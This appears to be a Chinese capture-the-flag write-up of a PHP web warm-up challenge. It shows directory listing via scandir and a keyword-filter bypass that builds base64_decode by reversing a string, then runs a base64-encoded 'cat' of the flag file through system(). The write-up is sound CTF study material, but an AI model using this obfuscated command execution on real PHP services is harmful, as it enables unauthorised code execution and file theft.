第三届京麒杯web

(Updated: )
赛题wp

热身赛

Execute

PHP版本是7.4.33,测了一下发现可以打无参数RCE

1
2
<?php
print_r(scandir('/'));

回显结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Array
(
    [0] => .
    [1] => ..
    [2] => bin
    [3] => boot
    [4] => dev
    [5] => docker-entrypoint.sh
    [6] => etc
    [7] => flag_i1q3hett
    [8] => home
    [9] => lib
    [10] => lib64
    [11] => media
    [12] => mnt
    [13] => opt
    [14] => proc
    [15] => root
    [16] => run
    [17] => sbin
    [18] => srv
    [19] => sys
    [20] => tmp
    [21] => usr
    [22] => var
)

但是读取文件的时候发现读不了

1
2
<?php
highlight_file(array_rand(array_flip(scandir('/'))));
1
2
3
4
<br />
<b>Warning</b>:  highlight_file(flag_i1q3hett): failed to open stream: No such file or directory in <b>[隐藏信息]
<br />
<b>Warning</b>:  highlight_file(): Failed opening 'flag_i1q3hett' for highlighting in <b>[隐藏信息]

可以使用逆序动态调用,绕过一下关键词

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
$a = "edoced_46esab";
$b = strrev($a);

//echo $b;
$c = "c3lzdGVt";
//echo $b($c);

$d = $b($c);

$e = "Y2F0IC9mbGFnX2lkbzhhN3E4";
$h =$b($e);
//echo $h;
$d($h);

EzLogin